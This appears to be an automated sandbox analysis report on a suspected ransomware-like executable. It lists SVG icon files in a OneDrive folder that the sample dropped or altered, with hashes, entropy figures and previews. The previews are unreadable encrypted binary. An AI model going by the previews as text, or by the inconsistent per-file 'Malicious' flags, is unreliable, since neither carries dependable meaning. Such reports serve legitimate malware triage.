MD5:	622CF94AC71BF8E82BECC9CA622662AD
SHA1:	38421D848648B9A5D08B0EBC284E1B117B9CF572
SHA-256:	FCF2AEA4EA32BDEECD12A5CDECB923A92DAB06C42757658EA36F777F391E5222
SHA-512:	FFB88531342DDC267CCD1C0672C0C6F9C0192E10B1ECA27BD25A3E43156CFA975685BBBB96B274A03788796A4711000CCF4605D5E4EF603B97E591028F4C73B7
Malicious:	true
Reputation:	unknown
Preview:	<svg ."....1......x..KG.....B_.o/-@.qm....o~....':ENj.\|A+ud......F....r........H...>c.`J...3......1..$...).K.7....x...E..l@..._)..;..6..^....%:S^....:.>~.r.).....z.&g).P.~.......a_M.d1..;/.h......Y..x$../.r.......@....^j.....m..pl..W...i........g.x....I=.IC>.l....k..y4.e...nn+:..m/;Y.p.....-.A"p..h...~.a.].z.ox..dO\|.g.h8.\|..6...M.t..9.`........?.u.b-s...W..0@.N.A.....z....._.U.FD..F/X.......sHr..@...4{.....{......N..(....[..........FNW.w.I}.p..N.M..J...@..:........7..+S..,...m...y......^s..YC..bZ......jn........!..._.u....@A...(....WIL....C ..p....O.".;...w...b\|.}.<.G.QPD.D$...(...D..?]f..VUv..].].<...A&.....2.y....n..UnSVF./z=Yn..t..g.g^n.Z.?Q......f,u/B.r4_,.=...t..fn.5J..`p8.....$Hj..(PGC.2^.&7.W.e..%.....#...2.....m......}.a.m7'...).(u.V.....m'$.._.....[......._6.W3.AYT"%@%...Z5.u.G.....0..j....8.G"....j7kD....9@*..7...I.V...E.cP..@..Bme..i....A..Y..^..'...q......9....V.s.nn.....R..yvo....N.i.?.".]...~ k.....f.7.R../...j...?..`;....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\folderIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	7.817602543733693
Encrypted:	false
SSDEEP:	24:tvSUNmkVT0q3vpybEtl9h3BVZ11sX0RSJj6Gmhl4LgFbD:ZbmkGctl7np3Ud6GKuOD
MD5:	330D9E5662848BEA610ADE9F3F5A3189
SHA1:	D33CE5C31E8FB7990FB34250271D27507CBBA143
SHA-256:	4DC6A5A9B23707BE3434EE41107B0DF3A2E4FE099A279DE7463923266DD75236
SHA-512:	B8066BBCB3FB8CB057CAE1B70DF9180F24688EB30930892F3EA18D982F87E475D4131ABCB1E4C1E3CB15534C51BA291462E355CACDAD511CDF72F109041FB4B1
Malicious:	false
Reputation:	unknown
Preview:	<svg u;f...p.K}.5"U.2u.tdd`.w}.B.C.z..z.k.@."..Eb.W.....Q3..........E..2..G}....;\|.......^.xv_Y.T.;..r.,.u.f.....G..!J.j..]3...(.D......c2...Ft...]P..6.d&Ko......D...w.d..b>~5...lG.......I..w........}..e...;9.2]..R.....:.p...Y.....#..~T.6.lxW.....;..lp.a.9=2.:.J.r.6m."..(...........mw.U..6.TR..p...`.Qm..S.ju\|,...-....?...T.uB.Cco].Z.....cJ.W."..g.....Z...?b.z..?y?<....70..'yA8L.7\.{l......U.1T.VV..7G...E......>.O.^krA..C,....x2.. g.../).z.1r.+?.....r..G...q'.D.....^Z.;F.K....S.#B...S/....e...5.8^NH$}.x....=.x..2...:gze{..........%.~M.Pp..#YV..`x.....} {r.H.Sa.....^...W.,....f..,.hA3......J&..j....P.@7..;.a...z..N.z....T....;%."..rP..R4..L.ga..s.@...%.~.....X2...R..ED.e......}`0...2.X..m$%....."...".2...Ax...M....6._...79l..f.Y.4....tm."We.1...]./.k].-7... @ p..x.3.Q.`/x...N=...,.Y0...#y...ac..@..G...O/.d....7.&`...w....].%[=..." ..\..2..........K..Z~.d...H......T.<\|E.i. e\|n...#.>...1...al,..9.t.t/:\r...r..C....%E.e".*U...kI....>P...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\folder_image_desktop.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2281
Entropy (8bit):	7.903045918671649
Encrypted:	false
SSDEEP:	48:C3js24CX19GNkuW/BqCwdiDqgXc2DBgFkkbXAzAhZrmy26SD:C3jsYthqC612AXYATmB66
MD5:	2A15B34E401CBE4A54D316C622F2F0DD
SHA1:	2E753690CB284A3C9EC33C085BCB4F8FCF58ECB5
SHA-256:	FE7C71F163DD474EC110F4FBE4DCBE5C45BCF1B65D4BA786FA203597E2CEEAF7
SHA-512:	5EE01C3D503FD450E23DF004C4237E7FD593B0E0B10399FCEA095569FEC86C38BAACADF573B7D4B3ED0BA8F11D0DD277F829C8EA41FDA797182E420870EA6B5D
Malicious:	false
Reputation:	unknown
Preview:	<svg xO?....F./~...{.5Y.d...,...Ut....G.?F....ozg.....02......e...0(..3...9....1.../8=.7.a.'...._..[....V<u.u.7<.........K.w..x:...}...Ld....j.iY....R..H^..m.......JI...M..X...>...s.. .]..q....p...H.,.v.s .I.S.3......'..?[..^.$E.F..~c.4A.`......13.]x.......A.....,...V.(qKot.ek.\...^Y.f.....0....\|..&....dIY..DJ..Y.2.......r.@.rf.I...{_.AqV.V...g....qZRbW..oY[...Nk.)yY..<.WO....pE.:]..F..{\UO...1Fg.r=.b.....s{.S.U.+.q-.\...~.B.}a......?.........."_1.&.R.?.._....0..^m.B!9jb..y%>".H..[gW.\|........M....F.c....,.........3.ksS....I.eK..5."..(^r...`......h^.N<uF.x...wI=..p......hrQ..[..4......C)G......U.n+....................\.l...(.MN.....%...-.D.y.\..?.}..?u...r...p...~U....5..#........0f![2.P.6Y.3.'...R.sU........"....iV....[.\|. t\.f...Q....QF.......O..ob...",.$2..d........_nd..VJ...Y...3..^....C........3K.>&..k...QCb.xC.A.&.u..I\|.p..H.?.Iy.n).mM...qq...."i..%D.~.b.C".....l..=p..(_...(.5m..l..X....JN...Y\|.."w3.I.S*a.....FV.$[\@...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\folder_image_documents.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	11261
Entropy (8bit):	7.983587449784692
Encrypted:	false
SSDEEP:	192:8WcyeStDM8qvs3OESzPuFh1T5ha1qumZGGk1vsYJvRXLKhYqRUa45XuzVCs/P:8SeStQc2PS7Ta1OZt8vsYJVmCyUaXz
MD5:	D41921628A7B4D2DDD1518C4346F88E4
SHA1:	8073F94F5CD6E62BEBE2E40347E2E9C26DFF164C
SHA-256:	98F9D7A49B3F3E1A88DF03B0F18346E98F82941168117DD7E3FBD76F665C43D1
SHA-512:	1F8A1974271ED612877DFE2DD2FC2B94D451AEB271C08462D09E7AAF783CA56A9B602E1365EAFB09E3AAD5F01398B8E68178D9A48C6F6AA98F21E87A1136F9FA
Malicious:	false
Reputation:	unknown
Preview:	<svg m.6...^..o......-.T~.(...S.....ii..M.R."..4U.aK..OQ..b.MB.....ra%....>b..CN?8...MW.N...0G..{......e..;.%R/..QTt../.H1.+..)......le.I..O......,..=.. ...-..zu^ Z..\`.5.T...B..3..r.o..,O.B!d7.......rX.. .)....z........^.wU.E .......Y@.ZAhL.....9.8.Z...Sx..d.......>.Z...(.;....}J.Q_..@7..\.p.U4.p.b.....7~z..U..I.nz.. ......d.u'.q.......z)..m.].u.o.{....x+.3..KVS......w.U..@H...8.....U........W..h.xD... \|.V.a.O.5x.9.&.......x.h..A.d........`j~}...:..z..0.....9:.DO..c.^[>.\DZ.CF..F.m.\|=......g.W..o...v..7.^...1{o.!...). ..2.]..I....j..!Y...E.).............w.0n..@....c...k.TQ...a.4..2_{V.F..XE7.crB1Aa.........&..N.,c4.G........y.<y..moo.]\..9._.3X.]1L..s0.?.:.].d~<y@C.hZ.'v.}C.=cQ#......R.CQ.~\|1G.K.bk+...\|..`............,..D..6.,Ihu....)..0..bG..8....WXt...F..._e....j....%7.lUB .K.e.....A.......m........Z..\.\\|.A.x.J..e-.k..7...7..K.m.n.1/..Im.L...f...".z._@w.T.3...`.{...w.x...X..ZW....B..l..>euY./.....H......?.C....g......WpG.)p.!9N.5...U?.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\folder_image_pictures.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7458
Entropy (8bit):	7.977375623881959
Encrypted:	false
SSDEEP:	96:pS6rs73bT99zu39xAv96TijaClgrYE28IrTaVeI9BA0+TZP9P8vb/JFo5ato4:pFrGG39yUTmlgrxvNV79WT8Tocu4
MD5:	CE3491F2993B283F86B72015072EB40D
SHA1:	85AD0730D7ED4C22D8A8BA44EF56DC5C098DB3EC
SHA-256:	EBF96B11478D1F2E19D789AEC9EA1D98DBF91E494B26C25A6475D72B2B5D832F
SHA-512:	2FDB772545CED615413B8A9FB6F83F35918EFF466CC1617D36B9C54F3B51C9712B4CFCD80B196931DFBB709E42A9F60EBC4D19741E0C02B65A97F0B142B46005
Malicious:	false
Reputation:	unknown
Preview:	<svg HY;.l.p..Q..B.......B#...6../.c.kz..a....\|.K.....E&.......;.v...M.^.dwr..r..]D..E,-.}.<@..R.C......J.X.....=...jiN.u..1......@.....^......i).e..."?...5L........Wz..a.\|....M.0.5..0...D..+...k.l]@:....v/.5rHs..,P=G..B.".4Vl*l...H1.8..2/...&..$..F..b..rs.+?j.(C..q+..wTq....U.W....rC...+"...I^..P...4P..UM..{9.....7..... ..Y_....D_..! .......:...CVDd...SIW/..7..".K.p`..QE;........<..Z.~....j9..as.o....Vf.P..}../..o.B. ...).@;....r].C..jZ.s.Z..E.R ..f^.X.._.]t2...G.u.i."..........m_NO..H.T48..O..d.b....8p.[...Q....I.....r..ND{..V........?.k.....'.....g.K3.SEO......zG6..e.D.f>.XM%..{QL@..6.0....a3.!..S..H...)_...&.b.s. .4..67.4AL....qr.z.i.....X`..-`...9..q..GWI.#.....w.j.9.p...n....y...T..(gJ..E...{y.G&2gq.V..59......Y.....{J.#B.....=z...!..n.....D.....l....~......).q...v ../..~:....O.~..1.7..\....a0..z..e...TW.4H.`.:.._..nX..Lq.Y.U.....y.=g.wy.{c.\|...J..$..X..L..%.{87o............[..=15!...;Ft....B....h.~._.....R.SG..V.t.......=

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\forwardArrow.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	564
Entropy (8bit):	7.529453022324502
Encrypted:	false
SSDEEP:	12:tc/VyLqhMyYXui/r2B7hqUoxTiuVoKEKYjjN7OBBdtcii9a:tMhK5+imYUoxuuVoKExjh7OPbD
MD5:	97263322B6F563891F45C5ACDDC2D39C
SHA1:	988B61C7A5D2422D81AD592C7E37B3832119D4C3
SHA-256:	D2F525EB25A1F0AC635D564BD930958E98329E15C5BCC44B07636D14CF69ED7E
SHA-512:	8FACCE55C7B1F8A0727166F98D1C3175FBFDE9118E548E87134103BE79B759E729B04FF8D50A4150DAB160E57EE0A6464ECF9E5AADAD1C7B20B8BEDC4D9C42F0
Malicious:	false
Reputation:	unknown
Preview:	<svg 1)...4...v...;....&.1....@.\|_..U.I.v.G...,.Y..9..b....P...!...........!..qb..Gbj.0..!....G%...Z.k.t4yQ.H..f.....R.>.....6pN..PF..L6..\|..y.).I.~.+...h..Y.E..6......._k3...L.3.$...i...xB.j)..e.....P.t1y.v43..k..O....c.......K.W...E..:"bY.U..{i`..t...ax .sK%.).X..a'..+..P.rW..uW.u.oZ.d.....9sw...(.... .C.64....i.-o.i....%.U..Y).x=.._.I.@.....$S,d...[kW._...?%.a.........u.....3mj(.=;.. ]l.z.].b.0...0d.F{Y....C.B.}.z}g.^.V...K\|=....E....:.e..XF.i....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\globeIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2586
Entropy (8bit):	7.9310666432255905
Encrypted:	false
SSDEEP:	48:AXjwGFybxrYAAwYGhT60FXC0oU8SX132UtyuGveypS/LnUhJ2YM8km5CwkD:ojzFEXzlB3XGPanUh+rmHw
MD5:	55271A4A3A139DE8FA73AB754F5BE2E8
SHA1:	21BC4F90942B6CE9E013147A2C9EFD4E5D869184
SHA-256:	3D55C2D0A89647ADEAFFA36245AB094FC24458C2253547A5A6D13CA9544F1997
SHA-512:	5DFDA8ED4A5E214442D42265287655EC15C9F80226B4A625A1085563AEDD9CDD9E750C0BC54601010D393FE10044FCEBB641B57D419C350113026D4FF9E74D56
Malicious:	false
Reputation:	unknown
Preview:	<svg .%.1rY..Co.v..cs.TR...$9........P5_.g.zB.../\.@Lc)d.?...`..88.cd.....,.5..........a...L.....j..vxk...#...P.A.!.C...fS4]...x.-.3j...'7..eK]...2...M......M.m...n...d.......].:..B....N1....0.^..R.1.A..h_......#...e.B.....P.H.`.U.&+..c.....;....F.4...._.1.U........7...>.{..bG..N.X..K...lt<D....p}s......(..c...,.Y.`...}ymp.I.f.Q..)l.3.hlp..T....A.".....\..S..t.(...R.7.K.V_..1o.].D. .......i?.R.v....UzQ.$e.....Y........e..n\[.g.#.J...v4.I/>.".8.S.4....[~.2Y......A8.....<.I:.._D...u\|..cJz7.GBvV..UF..p.uH.y..F.zy..s(W...[Trf[(...1.z{..,......j&.i^..U..n.J.8C.....c....I=.w$T.\.w.Gg.....d..>xI...^..K.)2G...m.S.s.4........K.{...W.}_B.}jJ.%-...8..m.V... E\|.b...R^.Zd......w...h.UjY.g..do....~.Hx..e...[.t_.....}^/.ni.}.w...Y6~'..(n_e,v..]x...%?k.Q.....Q.0.P.....7<.......z..#g....<..FN...M...95.Fy.."..g..7Se..x..U.. .,...[k....jh.`.....-..z.W.X.....#;..nF...\dS..k.&..o........1R.."..5o....!.q.P.+?I..&sz...8.......W5....^..-...v.f3..*G.&.!.2.~.T..L.(

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\iceBucket.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	6268
Entropy (8bit):	7.968540090375894
Encrypted:	false
SSDEEP:	192:dvn+D2k1C322xhjfJWmCudmLv8uasTUpfvHj:dv+D7S2ifzCuM4oTURfj
MD5:	060CD3CA2607036543CC68B43EB97AC0
SHA1:	946DD6026A421967558451D964A49CA8246648BB
SHA-256:	AE7D8EC3232AB81571F6B8BF48BF03CE8D9154425129D5C7E1D22B70C687BB26
SHA-512:	D9F0DA75B1C6B17F1D08A96F652DC377582E082A08F97908B1C053813E03B76FC2F92A8CB7AC35E0F53E2FE4C98496387340955D0427BE3BE72D02EEECB3C6EC
Malicious:	false
Reputation:	unknown
Preview:	<svg .u. ;..LS....D.i..+`^. nGw;.g..NV....E..Z&.XnD0"......W.(.'...".f/.D.1&v..).s.....\......:y_...).....XCg..l.....l..v.9T...>@.{.N...!O......v.....iWR.i...{5e.8..1.)J......?...U.v..8.nx...a..?%:.>.e.Z'.k..Z.L./Y..kv3)....!.W.&.,..qQ........Yx....k8D6....>.....D...VH...1....5\|.yR+H.&....PV.O..%P.5H.o.....}I.d.....W!..[.....w......]...:.FU.O;2..'....?...{>....pNr..'.G.D.K@.D....h.&4.K........._}..$...].W..i.......S.N.H.O..I...l.U.^....3..%.p.;- ..5.!Hta9...?.\j...^.j...C.5..}..T..O...PLTD.....?....p...{`....y\|..=.5....hNM...v....SZs6s^a....C......VKWZ..J.{.S.F..j;..f..r.=.....G..L..1=......v_..@.......G..... .Nm....)8.....v....R^1...+.v....t.f)O..Y$c.a..h.C.`5u......Pz.&...1.._.S.YV.%[0.o...j.\l0............/i.........h..H..[......Fk..<....h..B.p..0.L7....O....^..]..B...h..s.....):XC.B!.V.K3B..>....En.'PyV.A..i.(......Fa.......S...4...J.`..mL..l./..a.7l_...L....Nz,.,6F'.#..z....E`X.h...C.K....u..I...VKZ.+...q{.0.x....$.g.t.-..KM..$Unq.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\infoIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1535
Entropy (8bit):	7.8708098743195185
Encrypted:	false
SSDEEP:	24:+b+iwWYLefmrhv0RakmoKNCDL0+waMKtOJbjulGoZLhXMt9pbD:q+j8/aw1DMKtOVIGELiJD
MD5:	4C10F0D3D5FBC45D153C9735F3A7456A
SHA1:	0AD4ED6177547C6C4B7BE4B5FD43D00B49812092
SHA-256:	AEF652307AB0F90E790BED2F61A9965AB24660DFF826871FF150E99E3BE4FFFF
SHA-512:	2DD56D9DF19FD5931C94E148A09DCFEA944BF9CC2991B1E4CEDF00C48CF1311A40AE7FF0290924EAC68F6292F219CCAE272BCD0EBF5740CE04745E2BE223CD21
Malicious:	false
Reputation:	unknown
Preview:	<?xmljH..\.M.<Ke......=(..n%Itr.@LIE;.n.Y.C...q_....Bh[0.....f.U.s....$......Z.......+/-.M.....-......;..Ca...B.z..c...9U..{....5,..Z.5......g....S.\|.D.......%..(....a.FFR.A.r.I...... pN>.V..5..sx{.).b.O..i.Q.......q^..1P......../........F.....aIyL.....-M...F.!k.........?5.T....O.....Z:..>.....is_?..(.,kX..]..^...k.7...(k.+.o.(.@E..7.m_....F..~U..s.S..#r...0B.r.........Kb..o4.{.. ..M....k.. ...'..1..Y..q...G.....Y...E...P.p.f...QQ.F.x.Cb..q.%.y.&-.z..k_..VK_.Z$.[..t.R&.....m.x.6t....K.{...n...!-.....f[f.o...e..9iIq....M.i.(..=..O.P..>...J...Y..8..l....JXc.B...x .,.w#......g..d,..,d..$oo.....@.......zN.n.......DV}....+<v.L@\...D^...=...e(.s.8...L..........&._+.X..z..K.Si}.......L....Q.{6.dBe....aK!,..B.4...G..;m.=.....>.t...".e&..D...e...8..wV.M.}.....e>...6.$.wGA.._.'r{(...H-.".1.g.y.i......A,......D...WL..,.Y.k...JoS.1s.!fU:L#.N_B......es...'..._..\..8#..2^BB^P...e....z.B..q....Z...H1..q.pq......g.....e....a.z....u.....p9......"88./

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\kfm_folders_image.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	21072
Entropy (8bit):	7.992115600746951
Encrypted:	true
SSDEEP:	384:zcXW1DAimAiEQg4k97Rh60mSfdtnE4RqSJtxA3ISCfElWibaAT7/Gnfq6EB90n+3:kW11Pcgxvg0NAXYx9SCfTkhHgqX8q
MD5:	2ECAEF2B2772F9E7D205F1CFFC4D84D5
SHA1:	399461248549CE46D22C9817FA3FB2401A876EA5
SHA-256:	6CE90C5730E8F4167AF245218FA8D790607E52B219AA2A62C46DAB5AFF77F5E3
SHA-512:	B1B290CCF65B04646C9794E1357E2397C6E13B6D5F49E6A845C498AAB78B9EA15E30AF21DD3886BDD7A1429C7BF209E8E6594EE021F5DB3919D85DAF2BDED66B
Malicious:	true
Reputation:	unknown
Preview:	<svg .G.%..7.[......0...3.8....6..v....P..6.....[..+Qn...u..)Q...I+2.qY9y...\|.W.[...a.'g....7+&.1iu+}.CH..:H...?.NN...(6r......n.".X.D.....M...~..5DL@)-.l..0j...:.#..rOX.3iJH.o....rl..Q.1....1.4..p).5{.....mM..X,......5W;..P..o....B.R.........p...r5.r....]./...0.(._+..}.b...T...M..\|...HuY..7n....z...].CW.t.D.._..P.m.7{Z.=9....D4A...M...g.M?.R.r l?YG.H.03...6....pM..\./#xJ.....G.)o.5...+.P...dj.\$...H.c.....~..6{..G...M..E......N.T.ZA....V..w<q..jqE0u..\..s.....P..q+q...d"4.d..B3,iV5H.jmON......u@.S.}.0...P....._........PS...YJ.... ...A..3L'.\>l(V.m.JC!.`?....:!...../..Y.v.l......3.."d..g..._P...P.....1[...G\Sf.\...:..l$w..5..4..^....h[n&...cE.~0B(.]W_^...4.z....H......c..b...~..pH...5H..p.-.f:H.K.9g.d.........K..\|.'9N{.......n.}:...1#6..U5...k.lE.{..a1.c]o.....\w..<..].W..;.v.1gPP..g.F..+.9.+\|pU.{...d.-T2G...m...t/.W+#...]..k.....$Ld[s..=H.X.).....d.B.i.M.m..i./.....Cu.5.H..c..1.3>U9r..F.~.n.^..K...T...XWh.=.#y.2.a.}..^..p<NRaY0>.7}.d

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\loading.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1052
Entropy (8bit):	7.793406871757636
Encrypted:	false
SSDEEP:	24:taufL05GTA63tJxOMSpzmE2iggeN/JoB+jtjJojBgRbD:5LQGTA63HxON29geNegjt9oOBD
MD5:	B153F37B1981743DC24CB28AF9157061
SHA1:	A76371809E5BB8409D0BFF077F365B4044FEA335
SHA-256:	676A3E325DD9F7D299E6CB072901E9769CA6741B76C605B9CB76471034B3389E
SHA-512:	88189B7F007513EC21E679FFD15FD3EDE83E8F0F82313BAD0C46A6F4BA9E8575A59C993D84A9C66A1648DD31BC8B1FB66E2D2055842A638742420B8D9E5C3BC6
Malicious:	false
Reputation:	unknown
Preview:	<svg ..:..W.....a.O..e.....2....>K~.G.....rV...V.7..^..oY..:..oY....y.}.u?....p..+.>..E..J.Y.>+xP....g...i...G.....H9..J.".o.....)...&:......#.:%.04..}....SEP..&u.C..W......\|...:...).".!e..lSK....76....3l'../..C.-N}dk..N=.d.>.G`....b.%.o....4...rT.@A..H.BK/.pB...A>f.U~A{..........0.._.!]Zc..)q.aK.o......:5.dj.':$7.[d..............H.NnUn:.....q....].4t....I7n..EK....V.Y..b.....".!...a..fG.U3.O.w.-.u.YB...:....&Q..z....-QM...W..~.<.L._.N.`......x........... ....W...ib.q7..oZ.hEo..Y.g$.E....i.t..C.b...UP.k...P.....Q.....$1.)D.P.[C.V..{.$.....f.\|..,....U...j...}..T<.k..WF....NE..y....i..vY.b.....aN9.U.'.aP.."R.qP!.Ds.U..Cg.hi..{;....+.B..xV.^....n...'p....&..2...(............H.w.u.{w._.b..P.o....\|.(..qd.7y....T....vO[..!....\m.+db..8..#.?.N..,..?..'.....9.....3.(.T7%.Z%Xl..9.!Rn#.....[..x.T...TGK.C...]....b1u.@..lq..-sI8..hS.b....=........'....&y`.i.4^..#Sh.....Z..@{..}?.#..;.C.~....."F...rO.)./.G.[XX..[..8...@... .K6te1YGPnIbo4GcGOEP3iHx1cF

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\loading_spinner.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	766
Entropy (8bit):	7.728118779305527
Encrypted:	false
SSDEEP:	12:tTrh8ACAGz4/D+wZ9fBevqpVpym75DPrlUFGSp/n7lKIcAlNbE3HcqaLXr8MQ0y1:tTd33Gz4qYfdVP7BP2FlNl/DeQLb8yMX
MD5:	76675CF34BA4127C169FF407C13BC06E
SHA1:	A5202D60FCEF85F4925BA2C0EF8B05678E781F28
SHA-256:	A91A5A590E537AF1C8B24145FAD85ADA6F2CC3AFD522AEA6F74A31E2A96C45E9
SHA-512:	7636B1907AABCA7BA6236B94A60809763B52848EB3CE7F8446EF1C330C5BF0C0F62CFE6D07E56520F3323B4EFA94730D302636100543644E3A61D91A62093917
Malicious:	false
Reputation:	unknown
Preview:	<svg q.v:<\|...EA.3.O....<9.NI.9....B.4Y.:H.$d#..ab8.v.K..q.u.!.P......6..........._.;V.....G;W......=.'.&..5....YU..X.g`..Qk..t.6.3..;..h.'.q.>...c....w.....<...a.R..@...)..8..F......*..N..>..^...r_.B..dg?.p....6..g..m.%...Q..2..E......P...]/ sVQ#.^......b. '...fq.B..\.7.G..IP.%....."A...o...+....O...T...>s-3...y.....:....Q......CX...H$.....g.Ej..j....N...._u\..8.<.....L:..R....~.....l...e[....i.^[S.7..0........x0......[.y.b...iY...$z=..\....(..q...?...H!..P./-h.O.j..).;.y!Z.F...+S.\|...._..y@.X.[.....=!q..2A.......L"oD.(A...u..=....0.t.F.q..3V.lK7.....b.[EEtS....I...z....0..}H..EE.$r...)..I..B...pAx.?.....c(._...J_......O.rKf... .[.Z/....\..8.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\lock_icon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.8416791626372255
Encrypted:	false
SSDEEP:	24:OOuUCZd3ckcqRnq5qKsZ10Ov/lRovTf2R4/9q6eDwiEfuKHWbQpQBfxybD:OjbrMk7ck/10OvqAq9yEWwWMpKmD
MD5:	41C953FC9099A9AF71EF091424051534
SHA1:	D31A540DBF5F9BB9CE5E74EAD809AB7FF1AF3290
SHA-256:	D723B74C90E98AD0ABEB4A8B107FE15ED0C86A49590FEF00B449ED2F282BA283
SHA-512:	DBDDA1F6BA83362D00BE1DEAF77EC5792CF20375F2890D335C1B4E925FD1528CDFFF6F3A382B115D31CA3F482B93F796F6E9C16CDB0C1013FD5ECF5FF80F7687
Malicious:	false
Reputation:	unknown
Preview:	<?xml;h......Tu..a..R..x.....?.'..ah...1Ug....q;.l.u.0=.1.<n..H{'ug.o..v<...R._.{o>.S'q`.l.../......1.o..Z......a-.e7.q....D.{Vt...H.7.]....)\|..L....9..V7..M...#.O.)}.....u ....J['.....F!.F.H.........<.h.....hI..) .7a,..c....m..\.V:7.@...[O...G..k)Gp.r.>.......y..5~~YR%.OS.._.J.s<.=..F......CH.pUb.8.a....v.q.[..S\|.D.!....%`,q.......?...q.3..;bJ..Je..J._..N.....DY..Z..y..s....K...........G.'...iKC..V...g9!_..Z..U......?..+$>.^..x..d.i..........=....\...$o..`....uDk..wOo...J=&.<.H.kB....?L .a..q...k..V.m_Q..,......3.%..~^3w.b-]iG...l\.k..de/..)Ag..c)..=z..hz.)@.{.~...).g...[...P35.v...b...3.....+.i..77.....W...^..KbQ.p....DL....c.k....(>.o-...^..R...LW....jh...\...`7...`9$..S./.hS....T.....G.@D..KmQDS?g..t.s@_M...........lQx..e&...1K.......e..T.E.ygO.c<.a..H....7.E...?.d.}3>..h .....8...qP).+z.....7..h...17..0?............<_...1.....@$_...i.....j....>S9C..iHNx[.@..4t.q .zz<c.T..9)...)....1...~..".6..2.P?.~sC..;...^...4.oo`.5.~...\

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\onDemandFiles.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7838
Entropy (8bit):	7.97356232340078
Encrypted:	false
SSDEEP:	192:WPI9kOMJGi0zetYuBAT6kecRUgEnNHMTtLPZT72EEQBYTU:WPIOOMJIzetFmTvRZEnNM92EEMD
MD5:	17E4A28325C5A653F573B3B923EF6E1E
SHA1:	45DF698743A2FED52E7186B90521EA1F4641CE02
SHA-256:	92A84FCA6235118FC359AF9D59A8D4450B4768DCA5FB1B30CB787ABBA0395173
SHA-512:	838B990F9114CECB4DA7E56E8D3CDC8A14961B44A486C907E547C999D2A26507A62F8B608AED7BE7AD5B82A619B697580BDE84A7542DDA82ECA5BB0A369F78EB
Malicious:	false
Reputation:	unknown
Preview:	<svg 0.+..?[... ./..U"vv....~........<FZ.>...84.....Y...[.,..>..Y.....D<?4.......b...1.yU...(...)S..I.....+.....".WT.....;...a...eME..t....Y...PD.m.~.?......,fd....dJ...f..g.y9.\.n.Y..\$.O.o..~.N....A....}...,X...%Xn:..........R.........h..j..j.O..f>.......ah...4P...N.....UN..%x.\|..3..p......d...e.o.V....7....z0w]6.(XJO.xY....)...z5C].c.t.f.]1...a...H..<^@.=\|r{.O......S...,.n./..t.6M......g\K.U...x.;..a.....N.Z...&SA;... N....<.%..NP}v.Nv...d....8.).%.O..!.!pNyp..?..n`j.K.,.d..W2../},....Q.......F$..@..V..Ni..vcwD.8*x.mN..Ud\|....cT..X+.1....'....=...q... 8....f.....#.l..CZa/c.,....pg+..d...Z.......?...".U.-/....w.mz...r.~-!yl..7i#9.OA\|l..2I........E..MTa..\|....k....:.......rG4..>..3.h..eg.!N.....:........<.8...I..)....F#.....D..z{$...X]....J.Z..H....../..?x.Yi.I.i.1p..S...........Z..Q4J.#c.j...B...,.......T.J.#P.6.X.J4^V.C.m..`0.....f....j..u`......,u..L..o[....r.c.Z/6x..\|.i$.?<..?..(...@\.F.........'i...&.O.L.S.......?VpbF.H~.M8......HpO..O

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\onDemandFilesDehydrate.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	10261
Entropy (8bit):	7.9841443282086715
Encrypted:	false
